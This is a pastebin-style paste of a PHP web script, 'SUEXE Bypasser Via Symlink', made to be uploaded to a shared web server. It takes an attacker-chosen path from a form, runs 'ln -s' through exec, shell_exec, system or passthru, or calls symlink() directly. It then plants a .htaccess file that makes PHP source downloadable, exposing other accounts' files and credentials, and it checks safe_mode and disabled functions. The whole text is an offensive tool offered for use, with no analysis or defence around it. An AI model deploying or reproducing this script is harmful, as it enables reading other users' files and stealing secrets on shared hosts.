
Suexe Bypass via Symlink |

Oct 28th, 2012
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PHP 3.25 KB | None | 0 0
  1. <html>
  2. <body bgcolor="0000000">
  3. <title>symlink</title>
  4. <center><b><h2><font color="red"> SUEXE Bypasser Via Symlink (V 1.01)</font></br></center></b></h2>
  5. <center><b><h4><font color="red">WITH THIS SCRIPT U CAN USE SYMLINK IN 2 METHODs</font></br></center></b></h4>
  6. <center><b><h4><font color="white">Dest = Destenation Of Path or file That u Want to Symlink It</font></br></center></b></h4>
  7. <center><b><h4><font color="white">name : File Name That u Want To create in ([path]/smlnk)</font></br></center></b></h4>
  8. <center><b><h4><font color="white">Upload This Script In Full SUEXE or FullPerm Directory</font></br></center></b></h4>
  9. <center><b><h4><font color="white">Written For *NIX Platforms</font></br></center></b></h4>
  10. </html>
  12. <?php
  14. //form defining
  15. print "<form method=post>";
  16. print "<center><font color=green>";
  17. print "<b>dest :</b><input size=50 name='destenation' value=''>";
  18. print "<br>";
  19. print "<b>name :</b><input size=50 name='name' value=''>";
  20. print "<br>";
  21. print "<input type=submit name=_act value='Create!'>";
  22. print "</center></font>";
  23. $dest = $_POST['destenation'];
  24. $destname = $_POST['name'];
  25. ?>
  27. <?php
  28. //defining variables
  29. $dir = dirname($_SERVER[SCRIPT_FILENAME])."/smlnk";
  30. $acc = $dir."/.htaceess";
  31. $cmd = "ln -s".chr(32).$dest.chr(32).$sym;
  32. $sym = $dir."/".$destname;
  33. $htaccess =  
  34. "Options +FollowSymLinks".chr(009).
  35. "DirectoryIndex seees.html".chr(009).
  36. "RemoveHandler .php".chr(009).
  37. "AddType application/octet-stream .php";
  39. if (!file_exists($dir)) {
  40. mkdir ($dir);
  41. }  
  42. sleep(1);
  43. if (!file_exists($acc)) {
  44. $handle = fopen( "$acc" , 'a+' );
  45. fputs( $handle ,  "$htaccess" );
  46. }  
  47. ?>
  49. <?php
  50. //check method
  51. if (function_exists (exec) OR function_exists (shell_exec) OR function_exists (system) OR function_exists (passthru)) {
  52. $check = 1;
  53. }else{
  54. $check = 0;
  55. }
  56. if(function_exists (symlink)) {
  57. $checks = 1;
  58. }else{
  59. $checks = 0;
  60. }
  61. ?>
  63. <?php
  64. //define command function
  65. $resault = '';  
  66. function command($cmde) {
  67.     if (!empty($cmde))  
  68.  {  
  69. if (function_exists('exec')) { $resault = @exec($cmde); }  
  70. elseif (function_exists('shell_exec')) { $resault = @shell_exec($cmde); }  
  71. elseif (function_exists('system')) { $resault = @system($cmde); }  
  72. elseif (function_exists('passthru')) { $resault = @passthru($cmde); }  
  73.  }
  74. return $resault;
  75. }
  76. ?>
  78. <?php
  79. //execution
  80. if ($check ==1 && $checks ==1){ command ($cmd); }
  81. elseif ($check ==1 && $checks ==0){ command ($cmd); }
  82. elseif ($check ==0 && $checks ==1) { symlink ($dest,$sym); }
  83. elseif ($check ==0 && $checks ==0)  
  84. {  
  85. print ("<center><font color=green><h1>script doesnt work for this server</font></h1></center>");  
  86. }
  87. ?>
  88. <?php
  89. //is safe mod on ? start
  90. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  
  91. {  
  92. $safe="<font color=red>ON</font>";
  93. }  
  94. else {$safe="<font color=green>OFF</font>";}
  95. echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>";
  96. //open safe mod end--
  97. ?>  
  98. <?php
  99. //disable function start
  100. echo "<font color=whitepurple>Disable functions :</font> <b>";
  101. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
  102. //disable function end--
  103. ?>
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